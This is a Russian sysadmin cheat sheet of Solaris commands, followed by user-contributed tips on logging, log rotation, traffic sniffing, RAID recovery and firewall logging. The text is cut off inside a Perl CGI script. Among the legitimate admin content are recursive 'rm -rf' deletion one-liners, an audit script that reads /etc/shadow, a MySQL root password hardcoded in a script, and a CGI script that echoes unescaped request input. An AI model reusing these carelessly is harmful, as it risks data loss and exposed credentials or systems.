ps -ef|grep -v "0:00"|more Получить список любого процесса с процессорным временем больше чем 0:00

ps -eo pid,args Список процессов в простом формате

ps -fu oracle|grep pmon Посмотреть, какие инстансы Oracle запущены

top -b 1 Отобразить наиболее прожорливый процесс и выйти

Управление ресурсами

/usr/bin/ldd [filename] Список динамических зависимостей выполняемого файла

/usr/proc/bin/pmap pid Отчет о карте адресного пространства процесса

Маршрутизация

route add net 128.50.0.0 128.50.1.6 1 Добавить маршрут

route change 128.50.0.0 128.50.1.5 Сменить маршрут

route delete net 128.50.0.0 128.50.1.6 Удалить маршрут

route flush Очистить таблицу маршрутов. Удаляются все записи

route get [hostname] Определить интерфейс, используемый для доступа к удаленному хосту

route monitor Мониторинг таблицы маршрутов

Поиск

egrep "patterna|patternb" Поиск нескольких шаблонов в одном файле

find -name "" -exec rm -rf {} \; Рекурсивный поиск файлов по имени и их удаление

find . -type f -print | xargs grep -i [PATTERN] Рекурсивный grep в файле

find . ! -mtime - | /usr/bin/xargs rm -rf Найти и удалить файлы старше

find . -exec egrep -li "str" {} \; Поиск строк в файлах, начинающихся с cwd

find . -mtime -1 -type f Поиск недавно измененных файлов

find . -type f -exec grep "" {} \; -print Искать файлы, содержащие в пределах дерева каталогов

find ./ \! -type f -exec ls -l {} \;|grep -v '^[l|p|s|-]'|grep -v 'total' | wc -l Посчитать число подкаталогов в каталоге

find / -fstype nfs -prune -o fstype autofs -prune -o -name filename -print Поиск вне файловых систем nfs

find / -mtime <# of days> Найти файлы, модифицированные # дней назад

find / -perm -2 -a ! -type l Найти файлы, доступные на запись 'others'

find / -type f |xargs ls -s | sort -rn |more Список файлов, занимающих много дискового пространства

find / -user Найти все файлы, принадлежащие

find / | grep [file mask] Быстрый способ найти файл

find /proc/*/fd -links 0 -type f -size +2000 -ls Поиск больших файлов, которые были удалены или перемещены, но остались открыты каким-либо процессом

grep /var/sadm/install/contents| awk '{ print $1 ' ' $10 }' Найти какому пакету принадлежит файл

ls -lR | grep Быстрая альтернатива find

Безопасность

crypt abc && rm abc.cr Дешифрация файла с помощью crypt

crypt abc.cr && rm abc Шифрация файла с помощью crypt

echo 'Please go away' > /etc/nologin Прекратить вход пользователей в систему

find / -perm -0777 -type d -ls Найти все каталоги на запись

find / -type f -perm -2000 -print Найти все SGID файлы

find / -type f -perm -4000 -print Найти все SUID файлы

trap 'exit 0' 1 2 3 9 15 Перехват специального сигнала и выход

vi -x [filename] Зашифровать файл с помощью vi

Установки терминала

stty erase ^? Для удаления символа использовать клавишу delete

stty erase ^H Для удаления символа использовать клавишу backspace

stty sane Перезапустить терминал после просмотра бинарного файла

tput rmacs Перезагрузить стандартный набор символов

Snoop

snoop -d pcelx0 Просматривать все пакеты на устройстве

snoop -i /tmp/mylog -o /tmp/newlog host1 Все пакеты с host1 записывать в лог

snoop -i /tmp/mylog -v -p101 Показать отладочную информацию по пакету 101 из лога

snoop -i /tmp/mylog host1 host2 Просмотреть лог на предмет пакетов между hosts1 и host2

snoop -o /tmp/mylog pcelx0 Сохранить все пакеты с устройства в лог

snoop -s 120 Отобразить первые 120 байт заголовка пакета

snoop -v arp Захват широковещательных пакетов arp в вашей сети

snoop port [port-number] Монитроинг конкретного порта

Файлы swap

mkfile -nv 10m /export/disk1/myswap Создает пустой 10-и мегабайтный свап-файл в /export/disk1

mkfile -v 10m /export/disk1/myswap Создает файл подкачки на 10 мегабайтов в /export/disk1

Пространство swap

swap -a /export/disk1/swapfile Добавить своп-файл

swap -d /dev/dsk/c0t0d0s4 Удалить свап-устройство

swap -l Вывести список текущих свап-устройств

swap -s Вывод доступного пространства

Конфигурация системы

/usr/sbin/eeprom auto-boot? false Изменить переменную autoboot? таким образом, чтобы система загружалась только после подтверждения

/usr/sbin/eeprom diag-switch? true Провести диагностику во время следующей загрузки

/usr/sbin/eeprom local-mac-address?=true Настройка многопортовой сетевой карты

/usr/sbin/grpck Проверить синтаксис /etc/group

/usr/sbin/pwck Проверить синтаксис /etc/passwd

/usr/sbin/sys-unconfig Очистить сетевую конфигурацию

/usr/sbin/useradd Добавить пользователя

drvconfig ; disks Добавить в систему диск горячей замены

Системная информация и мониторинг

/bin/echo "0t${stamp}>Y\n Перевод времени UNIX в удобоваримую форму

/usr/platform/`/bin/uname -i`/sbin/prtdiag -v Диагностика системы

/usr/sbin/eeprom Просмотр параметров eeprom

/usr/sbin/prtconf -vp Детальный просмотр системной конфигурации

coreadm -e log Отчет ядра

grep "\-root" /var/adm/sulog | grep -v \+ | tail -25 Перечислить все попытки переключения на аккаунт root

isainfo -bv Быстрая проверка режима 32 или 64 bit

last Показать, кто и откуда входил в систему

logger -i

prtconf -pv | grep banner-name |awk -F\' ' { print $2 } ' | head -1 Показать модель сервера

prtpicl -v | grep wwn Команда поиска постоянно выделенной памяти (?)

psradm -f [processor id] Отключить процессор (?)

psrinfo | wc -l Показать число процессоров

sar -u Отчет о загрузке CPU

sar [ -aA ] [ -o filename ] t [ n ] Обобщенный отчет об активности системы

telnet 13 | grep ':' Получить время удаленной машины

uname -a Отобразить системную информацию

uname -X Отобразить системную информацию

vmstat 10 Отчет о основных системных параметрах в течении 10 секунд

who -b Причина последней перезагрузки

ypcat hosts | sort -n -t. +0 -1 +1 -2 +2 -3 +3 -4 Взять вывод команд "ypcat hosts" или "cat /etc/inet/hosts" и сортировать по IP

Как в Solaris примонтировать локально .iso образ. [комментарии]

lofiadm -a cdrom.iso mount -F hsfs /dev/lofi/1 /mnt umount /mnt lofiadm -d /dev/lofi/1

Syslog, ведение логов

Аудит системных пользователей (можно через Ansible) Автор: ilya [комментарии]

Очень часто, на новом месте, хочется понимать всю картину (от слова совсем), кто какие ключи, какой пользователь, какой сервер и т.д. Простите за качество, но работает, суть в следующем, скрипт запускается на сервере (python2 без зависимостей), нагло грепает /etc/passwd /etc/shadow и пользовательские authorized_keys. В stdout выдает только тех пользователей у которых присутствует пароль и/или приватный ключ (читай могут войти удалённо): Скрипт: https://github.com/iHile/InventoriZE Копия: https://www.opennet.ru/soft/audit-system-users.py В Ansible интегрируется банально просто: - name: Executing audit-system-users script... script: "audit-system-users.py --json" environment: INVENTORY_HOSTNAME: "{{ inventory_hostname }}" INVENTORY_GROUPS: "{{ group_names | join(',') }}" ANSIBLE_DATE_TIME_ISO8601: "{{ ansible_date_time.iso8601 }}" ANSIBLE_HOST: "{{ ansible_host }}" INVENTORY_DESCRIPTION: "{{ inventorize_description }}" args: executable: "{{ ansible_python.executable }}" register: audit_system_users_run Предложенный вывод можно скармливать в ELK и получить довольно чёткую картину происходящего. p.s. Обратите внимание, что никаких штук вроде LDAP/FREEIPA - не нужно, утилита самодостаточно грепает активных пользователей и выдает в stdout/json

Настройка ротации логов MongoDB Автор: linuxquestions.ru [комментарии]

По умолчанию MongoDB обычно не имеет настройки ротации логов. Это порой приводит к неприятным последствиям, особенно на арбитрах в реплике. Обычно их устанавливают на разного рода микроинстансы с минимальным количеством свободного места, так как основная задача арбитров следить за прохождением выборов и место под хранение данных им нужно минимальное. По умолчанию mongodb при вызове ротации логов просто переименовывает файл. Эту ротацию можно вызвать прямо из консоли mongoclient: use admin db.runCommand( { logRotate : 1 } ) Это не совсем удобно для автоматизации, поскольку отсутствует механизм удаления больших и старых файлов. Однако такой механизм присутствует в утилите logrotate, которая имеется почти во всех популярных дистрибутивах Linux. Для корректной настройки классической ротации логов с помощью logrotate.d.нам потребуется немного исправить /etc/mongod.conf: systemLog: destination: file path: "/var/log/mongodb/mongod.log" logAppend: true logRotate: reopen logAppend: true нам нужен с целью дописывания в конец файла, а logRotate: reopen нужен для того, чтобы файл переоткрывался после ротации, т.к. мы будем ротировать файл с помощью внешней утилиты logrotate. Советую также обратить внимание на путь к pid-файлу демона mongod (секция processManagement, опция pidFilePath), он нам потребуется позднее. После исправления файла конфигурации не забудьте перезапустить MongoDB. Теперь нам необходимо создать файл /etc/logrotate.d/mongodb со следующим содержимым: /var/log/mongodb/mongod.log { rotate 7 daily size 1M missingok create 0600 mongodb mongodb delaycompress compress sharedscripts postrotate /bin/kill -SIGUSR1 $(cat /var/run/mongodb.pid) endscript } Команда kill посылает сигнал SIGUSR1 процессу, id которого считывается из /var/run/mongodb.pid (здесь должен быть путь из pidFilePath). Протестировать данный файл достаточно легко: logrotate --force /etc/logrotate.d/mongodb

Отправка сообщений Syslog на почту Автор: Jordan [комментарии]

Возникла необходимость рассылать некоторые уведомления из Syslog-a на почту. К сожалению такой функциональности по умолчанию в systlg не было. Порывшись в интернете нашел два способа решения проблемы.
замена Syslog на Rsyslog с использованием модуля ommail
Написание скрипта для крона, который будет отслеживать изменения в логах с дальнейшей отправкой. Ни один из методов не показался интересным, поэтому вернулся к руководству. В руководстве наткнулся на следующее: The action field of each line specifies the action to be taken when the selector field selects a message. There are five forms: A vertical bar ("|"), followed by a command to pipe the selected messages to. То есть, "можно перенаправить сообщение на команду". В связи с чем появилась первая попытка console.* |mail -s "info" "user@mail.net" Закончившаяся фиаско, так как сообщения накапливались в буфере и отправка происходила только после рестарта самого сислога. После чего было решено использовать простой скрипт console.* /var/log/console.log console.* |/home/user/toor/sysmail.sh где сам sysmail.sh #!/usr/local/bin/bash read data echo $data | mail -s "info" "user@mail.net" В итоге получаем следующее. События записываются в файл на системе и отсылаются на почту user@mail.net с темой info.

Скрипт генерации статистики для Free-SA Автор: Linjan [комментарии]

Анализатор логов Squid Free-SA (http://free-sa.sourceforge.net/) значительно удобнее и быстрее SARG. Во FreeBSD его можно установить из портов (/usr/ports/www/free-sa/). Настраивается программа достаточно тривиально, достаточно использовать поставляемый в комплекте (после установки порта находится в /usr/local/etc/free-sa/) пример free-sa.conf.sample, поменяв там путь к логам Squid в директиве "log_file". Через файл usertab (путь задается директивой username_file) можно определить псевдонимы для замены IP адресов именами пользователей, например, указав "192.168.0.1 Директор". При необходимости меняем путь к директории для сохранения сгенерированных отчетов (target_directory) и директории для сохранения временного кэша данных из лога Squid (директива cache_directory). Базовые параметры можно переопределить вручную, запустив из командной строки: free-sa -d 20.09.2010-21.09.2010 -l путь_к_логу_squid -o директория_для_сохранения_отчетов Ниже представлен скрипт для генерации статистики по заданным интервалам: #!/bin/bash # Modification for free-sa # Idea: ## SARG - Daily/Weekly/Monthly Squid usage reports creation tool ## Written by Ugo Viti <ugo.viti@initzero.it> ## Thanks for enanchements to: ## - martijn ## - Stas Degteff https://sourceforge.net/users/stas_degteff/ # Modification by Linjan <tank1992@gmail.com> FREESA="/usr/local/bin/free-sa" CONFIG="/usr/local/etc/free-sa/free-sa.conf" TMPFILE=`/bin/mktemp` ERRORS="${TMPFILE}.errors" # Date Calc MANUALDATE=$2 case "$(uname)" in "FreeBSD") TODAY=$(date +%m/%d/%Y) YESTERDAY=$(date -v-1d +%m/%d/%Y) WEEKAGO=$(date -v-1w +%m/%d/%Y) MONTHAGO=$(date -v-1m +%m/01/%Y)-$(date -v-1m +%m/31/%Y) ;; *) TODAY=$(date --date "today" +%m/%d/%Y) YESTERDAY=$(date --date "1 day ago" +%m/%d/%Y) WEEKAGO=$(date --date "1 week ago" +%m/%d/%Y) MONTHAGO=$(date --date "1 month ago" +%m/01/%Y) ;; esac manual () { if [ -z "$MANUALDATE" ] then echo "No date given, please specify a valid date (MM/DD/YYYY)" else $FREESA -f $CONFIG -d $MANUALDATE-$MANUALDATE fi } today () { $FREESA -f $CONFIG -d $TODAY-$TODAY >$ERRORS 2>&1 } daily () { $FREESA -f $CONFIG -d $YESTERDAY-$YESTERDAY >$ERRORS 2>&1 } weekly () { $FREESA -f $CONFIG -d $WEEKAGO-$YESTERDAY >$ERRORS 2>&1 } monthly () { $FREESA -f $CONFIG -d $MONTHAGO-$YESTERDAY >$ERRORS 2>&1 } case $1 in manual) manual ;; today) today ;; daily) daily ;; weekly) weekly ;; monthly) monthly ;; *) echo "Usage: $0 [OPTIONS]" echo echo "Allowed options:" echo " manual, Create Manual report" echo " date format is MM/DD/YY" echo " today, Create Today report" echo " daily, Create Daily report" echo " weekly, Create Weekly report" echo " monthly, Create Monthly report" exit 0 esac Помещаем данный скрипт в директорию, откуда будем его запускать, присваиваем права запуска и добавляем эти строки в crontab: 00 00 * * * freesa-reports daily 00 01 * * 1 freesa-reports weekly 30 02 1 * * freesa-reports monthly

Борьба с kernel panic в Linux-ядре 2.6.35 и выше Автор: Аноним [комментарии]

Начиная с версии 2.6.35 в Linux-ядре появилась полезная функция "ramoops", позволяющая в случае краха сохранять информационный дамп состояния ядра в памяти для последующего анализа. Данные сохраняются только при мягкой перезагрузке, без очистки прошлого состояния памяти. Вкомпилировать данную функцию в ядро или загружать модулем "ramoops" - без разницы. Единственная хитрость - сначала нужно зарезервировать память в ядре. Сделать это можно указав ядру параметр memmap=256K@0xfc0000 (резервируем 256К перед ядром). Если ramoops в ядре, то добавляем параметры ramoops.mem_address=0xfc0000 и ramoops.mem_size=0x40000 параметр ramoops.dump_oops=1 является умолчанием, так что его можно не указывать. Для модуля "ramoops" эти параметры нужно указать при загрузке. Теперь чтобы ядро не осталось в мертвом виде, не забываем сделать echo 10 >/proc/sys/kernel/panic и (если нужно, а иногда полезно) echo 1 >/proc/sys/kernel/panic_on_oops Теперь проверяем при помощи crash-а через Alt-SysRq-C. После перезагрузки, текст crash-дампа будет лежать в памяти, начиная с адреса 0xfc0000. Достать его оттуда можно при помощи dd if=/dev/mem bs=256k skip=63 count=1 >>crash.txt либо при помощи простенькой программы, которая открывает /dev/mem и с указанного смещения читает данные. Для сохранения дампа на диск следует использовать похожую функцию mtdoops. Дополнение: Для работы в ядре необходимо выключить опцию CONFIG_STRICT_DEVMEM

Быстрый способ учета трафика на сетевых интерфейсах (доп. ссылка 1) Автор: Gleb Poljakov [комментарии]

Дано: Почтовый сервер на базе Ubuntu 8.10 Четыре сетевых интерфейса Необходимо: Считать трафик на каждом интерфейсе, вести статистику. Решение: vnstat (http://humdi.net/vnstat/) - маленький консольный пакет, который считает трафик на указанных интерфейсах и не загружает систему. Показывает статистику по часам, дням неделям и тд. Не требует для своей работы привилегий суперпользователя, поддерживает Linux, *BSD и Darwin/MacOS X. Для доступа к статистике дополнительно доступен web-интерфейс. Устанавливаем vnstat: #apt-get install vnstat Инициализируем базу данных для каждого необходимого интерфейса: #vnstat -u -i eth0 #vnstat -u -i eth1 #vnstat -u -i eth2 Далее необходимо сказать vnstat запустить мониторинг интерфейса. Это можно сделать путем ifdown/ifup для каждого интерфейса, либо, если нет желания разрывать соединения выполнить для каждого: #IFACE=eth${i} #export IFACE #/bin/sh -x /etc/network/if-up.d/vnstat где ${i} порядковый номер интерфейса. Все, мониторинг готов, теперь по прошествии нескольких минут можно смотреть статистику #vnstat -q

Восстановление программного RAID в Debian Lenny Автор: dimarem [комментарии]

Пришло сообщение, что отказал RAID: This is an automatically generated mail message from mdadm running on A DegradedArray event had been detected on md device /dev/md0. Faithfully yours, etc. P.S. The /proc/mdstat file currently contains the following: Personalities : [raid1] md0 : active raid1 sda2[1] 388604224 blocks [2/1] [_U] unused devices: <none> Смотрим, что случилось: #cat /proc/mdstat Personalities : [raid1] md0 : active raid1 sdb2[1] 388604224 blocks [2/1] [_U] #mdadm --detail /dev/md0 /dev/md0: Version : 00.90 Creation Time : Thu Feb 19 14:59:47 2009 Raid Level : raid1 Array Size : 388604224 (370.60 GiB 397.93 GB) Used Dev Size : 388604224 (370.60 GiB 397.93 GB) Raid Devices : 2 Total Devices : 1 Preferred Minor : 0 Persistence : Superblock is persistent Update Time : Thu Mar 12 11:23:38 2009 State : active, degraded Active Devices : 1 Working Devices : 1 Failed Devices : 0 Spare Devices : 0 UUID : 60b0013f:7372c5d4:262fce52:c3c9a424 Events : 0.321 Number Major Minor RaidDevice State 0 0 0 0 removed 1 8 18 1 active sync /dev/sdb2 Вынимаем битый диск и подсовываем такой же по размеру, проверяем: # fdisk -l Disk /dev/sda: 400.0 GB, 400088457216 bytes Disk /dev/sda doesn't contain a valid partition table Disk /dev/sdb: 400.0 GB, 400088457216 bytes Device Boot Start End Blocks Id System /dev/sdb1 1 262 2104483+ 82 Linux swap / Solaris /dev/sdb2 * 263 48641 388604317+ fd Linux raid autodetect Создаем разделы, как на живом диске: # sfdisk -d /dev/sdb | sfdisk /dev/sda Проверяем разбивку: # fdisk -l Disk /dev/sda: 400.0 GB, 400088457216 bytes Device Boot Start End Blocks Id System /dev/sda1 1 262 2104483+ 82 Linux swap / Solaris /dev/sda2 * 263 48641 388604317+ fd Linux raid autodetect Disk /dev/sdb: 400.0 GB, 400088457216 bytes Device Boot Start End Blocks Id System /dev/sdb1 1 262 2104483+ 82 Linux swap / Solaris /dev/sdb2 * 263 48641 388604317+ fd Linux raid autodetect Теперь можно подключить новый диск в raid: # mdadm --add /dev/md0 /dev/sda2 mdadm: added /dev/sda2 Проверяем как идет процесс ребилдинга: # cat /proc/mdstat Personalities : [raid1] md0 : active raid1 sda2[2] sdb2[1] 388604224 blocks [2/1] [_U] [>....................] recovery = 0.5% (1944960/388604224) finish=102.7min speed=62740K/sec unused devices: <none> и не забыть про grub: # grub grub> root (hd1,0) grub> setup (hd1) grub> quit И все готово.

Временное ведение лога всех запросов к MySQL (доп. ссылка 1) [комментарии]

Использование опций конфигурации log-slow-queries и general_log, позволяющих вести полный лог медленных или всех запросов, требует перезапуска mysql для включения или выключения ведения логов, что неудобно в ситуации, когда нужно проанализировать запросы только в текущий момент. Для анализа запросов (не через локальный сокет) на лету можно воспользоваться сетевым сниффером. Перехватываем и записываем срез трафика MySQL в файл: tcpdump -i eth0 port 3306 -s 1500 -w tcpdump.out Выделяем из дампа SQL запросы, используя утилиту tshark из комплекта сниффера Wireshark (http://www.wireshark.org/): tshark -r tcpdump.out -d tcp.port==3306,mysql -T fields -e mysql.query > query_log.out Удаляем из полученного лога пустые и неинформативные строки: cat query_log.out | grep -vE "^(commit.*|autocommit.*|rollback.*|)$" | awk '{print $0 ";"}' > query_log_no_blank.out Полученный лог удобно анализировать утилитой mysqlsla (http://hackmysql.com/mysqlsla)

Помещение данных о входящем трафике из ipcad в лог squid (доп. ссылка 1) Автор: Забудкин Лев Мирославович [комментарии]

Чтобы анализаторы логов прокси сервера squid отображали данные о пересылках в обход прокси, например данные по почтовому или ssh трафику, можно сохранить данные о таких пересылках в логе squid. Настройки ipcad: capture-ports enable; interface ppp* filter "ip and not dst net 192.168.0.0/16"; aggregate 0.0.0.0/0 strip 32; /* Считаем все адреса */ /* Теперь укажем какие порты как отображать */ aggregate 1-19 into 65535; aggregate 20-21 into 21; aggregate 22-23 into 22; aggregate 25 into 25; aggregate 24 into 65535; aggregate 26-79 into 65535; aggregate 80-81 into 0; aggregate 82-109 into 65535; aggregate 110 into 110; aggregate 111-442 into 65535; aggregate 443 into 443; aggregate 444-3127 into 65535; aggregate 3128 into 0; aggregate 3129-65535 into 65535; Сам файл обработки ipcad и записи в сквидовский лог: #!/bin/sh net="192.168" ttime=`/usr/bin/rsh localhost sh ip acco|/bin/grep 'Accounting data saved'| /bin/awk '{print ($4)}'` /usr/bin/rsh localhost clear ip accounting /usr/bin/rsh localhost show ip accounting checkpoint|/bin/grep $net|/bin/awk -v vtime=$ttime '{print (vtime".000",1,$1,"TCP_MISS/200",$4,"CONNECT",$2":"$6,"-","DIRECT/"$2,"-")}' >>/var/log/squid/access.log Вместо 192.168 Вы можете указать свою сеть, которую брать с ipcad'а и заносить в лог прокси сервера Squid. Таким образом весь трафик, указанный в настройках ipcad'а будет отображен в access.log сквида, который в данном примере находится в папке /var/log/squid.

Быстрй перенос лог-файлов в MySQL Автор: Alexey Lazarev [комментарии]

Наверняка, каждый сталкивался с задачей переноса лог-файлов из текстовых файлов в различные БД. И, наверняка, каждый столкнувшийся начинал писать собственные скрипты под это дело. Причем большинство виденных мной скриптов основывались на построчном чтении/переносе данных. Данный способ, конечно, хорош и имеет право на существование, но, к сожалению не очень быстр. Но в MySQL существует способ перенести данные из обычных текстовых файлов в БД очень и очень быстро при помощи директивы LOAD DATA INFILE Пример такого скрипта: #!/bin/bash nld='/var/log/squid3' # Путь к лог-файлам nbd='/opt/backup/squid3' # Путь к папке резервного хранения лог-файлов nrc=`squid3 -k rotate` # Команда ротации лог-файлов для данного сервиса nlf='/var/log/logs2mysql/squid.log' # На всякий случай пишем что и когда делали mh='localhost' # Mysql host mu='root' # Пользователь mysql mp='secret' # Его пароль mb='logs' # База данных mt='squid' # Таблица echo `date +"%F %T"` "Начало выгрузки" >> $nlf && \ $nrc && \ for i in `ls $nld | grep access.log.`; do year=`date +"%Y"` month=`date +"%m"` day=`date +"%d"` prefix=`date +"%F-%H"` test -d $nbd/$year/$month/$day || mkdir -p $nbd/$year/$month/$day && \ cat $nld/$i | sed -e 's/\"/\\\"/g' | sed -e "s/\'/\\\'/g" | \ awk ' {print strftime("%F",$1),strftime("%T",$1),$1,$2,$3,$4,$5,$6,$7,$8,$9,$10,$11,$1 $2 $3 $4 $5 $6 $7 $8 $9 $10 $11} ' | \ sed -e "s/ /\t/g" > $nld/prepare.log && \ chmod 0777 $nld/prepare.log && \ mysql -h $mh -u $mu -p$mp -e "LOAD DATA INFILE \"$nld/prepare.log\" REPLACE INTO TABLE $mb.$mt;" && \ cat $nld/$i >> $nbd/$year/$month/$day/$prefix.log && rm $nld/$i && rm $nld/prepare.log done echo `date +"%F %T"` "Конец выгрузки" >> $nlf Поля для таблицы ('Поле'-тип) 'date'-date 'time'-time 'timestamp'-varchar(16)(разные сервисы пишут по разному.Кто-то с милисекундами, кто-то без) 'elapsed'-int(20) 'ip'-varchar(15) 'code'-varchar(20) 'size'-int(20) 'method'-varchar(10) 'url'-varchar(255) 'user'-varchar(255) 'direct'-varchar(25) 'mime'-varchar(25) 'hash'-varchar(255)unique C небольшими изменениями данный скрипт можно приспособить для обработки лог-файлов не только squid, но и других сервисов. Необходимое условие: четкое разграничение полей (можно, поиграться с указанием разграничителей полей в директиве LOAD DATA INFILE). К преимуществам данного скрипта можно отнести огромное быстродействие (п4-3,2 1024Мб ОЗУ 4млн. строк за 10-12 сек.).Также по последнему полю "hash" мы можем уникальным образом идентифицировать строку (при анализе логов за год по squid и net-acct я не обнаружил одинаковых строк).А также гарантированное попадание всех строк в БД (т.к. данные не удаляются при сбое mysql).

Логгирование POST-запросов в apache (доп. ссылка 1) Автор: mahoro [комментарии]
В некоторые моменты чувствую себя очень неуютно из-за того, что нет возможности посмотреть, что конкретно делают с моим сервером некоторые персоны. Я долго искал возможность логгировать все, в том числе и POST запросы клиентов и нашел способ - через mod_security.
Устанавливается он элементарно apxs -cia mod_security.c (см документацию, правда, для его работы в наиболее удобном, "Concurrent", режиме логгирования, нужен модуль unique_id. После установи модуля следует добавить следующую секцию в httpd.conf:
<IfModule mod_security.c> SecAuditEngine On # У mod_security есть два механизма логгирования, Concurrent - более быстрый и продвинутый. SecAuditLogType Concurrent # Здесь будет храниться индекс - файл, по структуре похожий на access_log + идентификаторы, # по которым можно найти полную информацию в StorageDir SecAuditLog /var/log/www/audit/index # Тут хранятся все данные запросов. Каждый запрос в отдельном файле. # Запросы разнесены по каталогам (вместе все запросы одной транзакции, вместе все транзакции одного дня) SecAuditLogStorageDir /var/log/www/audit/data/ # Наиболее полное логгирование (man) SecAuditLogParts ABCDEFGHZ # Добавить обработку POST данных. SecFilterScanPOST On SecFilterEngine On # Следующие строки нужны для сохранения загруженных на сервер файлов: SecUploadDir /var/log/www/audit/upload SecUploadKeepFiles On </IfModule>

Включать это имеет смысл при подозрении, что кто-то пытается использовать вашу систему не по назначению, теперь любой шаг проходимца будет записан.
p.s. Работоспособность конфига проверялась в apache 1.3.37, mod_security 1.9.4, но работать должно и в 2.0/2.0

Хранение файлов конфигурации в RCS (доп. ссылка 1) Автор: mahoro [комментарии]

Система управления версиями RCS пригодилась для сохранения резервных копий файлов конфигурации и нескольких Perl модулей, активная разработка которых уже завершена, но мелкие исправления и переделки еще бывают. Итак, для работы с RCS используются следующие команды - ci (импорт файлов в репозиторий), co (экспорт), rcs (манипулирование флагами файлов и проч.), rcsdiff, rlog. Пусть file - файл, который требуется передать в управление RCS. ls -la > file Первым делом нужно создать каталог для репозитория mkdir RCS Затем импортировать файл. В общем случае это делается так: ci file Исходный файл _перемещается_ в репозиторий (если он там уже есть, то под новой версией). Извлечь файл из репозитория можно командой: co file (файл будет иметь права доступа 444) Чтобы изменить файл, нужно установить его блокировку и установить права доступа, разрешающие запись rcs -l file chmod o+w file Чтобы записать изменения нужно снова выполнить ci file Итак, это все, что нужно для того чтобы начать работать. Теперь пара команд, для того, чтобы работать было удобно :) co -l file - синоним co file; rcs -l file; chmod 644 file - извлечь, заблокировать файл, разрешить запись. ci -u file - синоним ci file; co file - сохранить файл и извлечь рабочую копию ci -l file - синоним ci file; co -l file - сохранить файл, сделать co -l В случае, если с файлом работает один пользователь, то в блокировках нет никакого смысла, и от них можно отказаться: ci -l file (первоначальный импорт) rcs -U file (установка перманентной блокировки) vi file ci -l file (файл сохранится в RCS и будет готов к дальнейшей работе) Далее, самые распространненые задачи: Извлечь файл из репозитория co file co -l file (синоним co file, rsc -l file -- извлечение и блокировка) co -r1.2 file (извлечение определенной версии файла) Посмотреть различия между текущей (=рабочей) версией и последней, сохраненной в RCS rcsdiff file Посмотреть различия между произвольными двумя версиями rcsdiff -r1.1 -r1.2 file Посмотреть логи редактирования файла rlog file Дальнейшее чтение: rcsintro(1), rcs(1), co(1), ci(1).

Как вести лог блокировок в iptables и ipfw [комментарии]

Linux: - Перед правилом блокировки нужно вставить "log" правило: iptables -A FORWARD -p tcp -m tcp -s 192.168.0.0/16 --dport 25 \ -j LOG --log-level debug --log-prefix "outgoing mail" iptables -A FORWARD -p tcp -m tcp -s 192.168.0.0/16 --dport 25 -j DROP - Проверить запущены ли в системе klogd и syslogd. - Настроить /etc/syslog.conf на прием kern.debug логов: kern.=debug -/var/log/kernel/info FreeBSD: Добавить ключ log в ipfw, например: ipfw add 1000 deny log tcp from any to 192.168.10.10 22 via fxp0 ipfw add 1000 deny log logamount 0 tcp from any to 192.168.10.10 80 via fxp0 Для ведения логов ядро должно быть собрано с IPFIREWALL_VERBOSE или нужно выставить "sysctl -w net.inet.ip.fw.verbose=1". Далее проверить чтобы в /etc/syslog.conf было упоминание LOG_SECURITY: security.* /var/log/security Через параметр logamount передается число записей которые будет записано в лог, после превышения записи перестанут появляться в логе, до тех пор пока не будет вызвана команда "ipfw resetlog". Максимальное число сообщений можно также установить через sysctl net.inet.ip.fw.verbose_limit. Для отмены лимитирования на число записей, нужно установить атрибут в 0.

Статистика сетевых соединений через syslog и iptables Автор: umask [комментарии]

Часто недовольные пользователи приходят и просят дать им распечатку логов доступа в интернет. Отчасти это позволяет сделать squid, но только при прозрачном проксировании, да и то логи только по http-протоколу. На помощь приходит iptables и syslog. Настраиваем в syslog.conf добавление сообщений от ядра уровня debug (или уровня, который вам удобнее) в отдельный файл. Лучше всего хранить эти логи на отдельном разделе (их размер огромен! но проблему решает gzip - сжимает логи более чем в 10 раз). В моём syslog.conf была добавлена строка: kern.=debug -/var/log/access/access Желательно, что бы в уровень debug сообщений от ядра не поступало никакой другой информации, кроме информации от iptables. У меня так и получилось по умолчанию с уровнем debug. В rc.firewall было добавлено в самое начало: #LOG ALL (!!!). Beware!!! #FORWARD iptables -A FORWARD -m state --state NEW -j LOG --log-level debug \ --log-prefix 'FRWLL_FWD_NEW ' # --log-tcp-options --log-ip-options #iptables -A FORWARD -m state --state ESTABLISHED -j LOG --log-level debug \ # --log-prefix 'FRWLL_FWD_ESTBLSHD ' # --log-tcp-options --log-ip-options #iptables -A FORWARD -m state --state RELATED -j LOG --log-level debug \ # --log-prefix 'FRWLL_FWD_RLTD ' # --log-tcp-options --log-ip-options #iptables -A FORWARD -m state --state INVALID -j LOG --log-level debug \ # --log-prefix 'FRWLL_FWD_INVLD ' # --log-tcp-options --log-ip-options #INPUT iptables -A INPUT -m state --state NEW -j LOG --log-level debug \ --log-prefix 'FRWLL_INPT_NEW ' # --log-tcp-options --log-ip-options #iptables -A INPUT -m state --state ESTABLISHED -j LOG --log-level debug \ # --log-prefix 'FRWLL_INPT_ESTBLSHD ' # --log-tcp-options --log-ip-options #iptables -A INPUT -m state --state RELATED -j LOG --log-level debug \ # --log-prefix 'FRWLL_INPT_RLTD ' # --log-tcp-options --log-ip-options iptables -A INPUT -m state --state INVALID -j LOG --log-level debug \ --log-prefix 'FRWLL_INPT_INVLD ' # --log-tcp-options --log-ip-options Если раскомментировать все строки, то получиться лог с полной статистикой доступа - он будет очень большим. Поэтому в данном примере имеем лог только по установкам соединений и ошибочным соединениям в цепочках INPUT и FORWARD. Итак. В logrotate я добавил (/etc/logrotate.d/access): /var/log/access/access { sharedscripts compress rotate 45 daily postrotate /bin/killall -HUP syslogd endscript } Сжимаем логи каждый день. Храним статистику за последние 45 суток. Компрессия логов в моём случае дала значительный прирост производительности, поскольку шлюз достаточно мощный и скорость парсинга логов упиралась только в чтение с HDD. В итоге был написан простой скрипт на perl, выдающий статистику в более-менее удобоваримой форме. Вот и сам скрипт: ------------------------- #!/usr/bin/perl use CGI qw(:standard); use PerlIO::gzip; use Switch; ##Redefine before start: my $LOG_DIR="/var/log/access/"; my $LOG_FILENAME="access"; ##end my $IP, $FLAG; ## Params delimeter in request: "-" ($IP, $FLAG) = split(/-/, $ARGV[0]); ## if undefine IP or file log FLAG-number or FLAG is empty - parser exit: if(!defined($IP)||!defined($FLAG)||$FLAG==""){ print header; print start_html; print "Valid parameters required!"; print end_html; exit(1); } print header; print start_html("Stat for: $IP"); print "<h2>Stat for: $IP</h2><br/>", "\n<pre>"; switch($FLAG) { case "0" { open($FD, "<$LOG_DIR$LOG_FILENAME") or die "Cannot open current (0) log-file!<br> File does not exist or access not 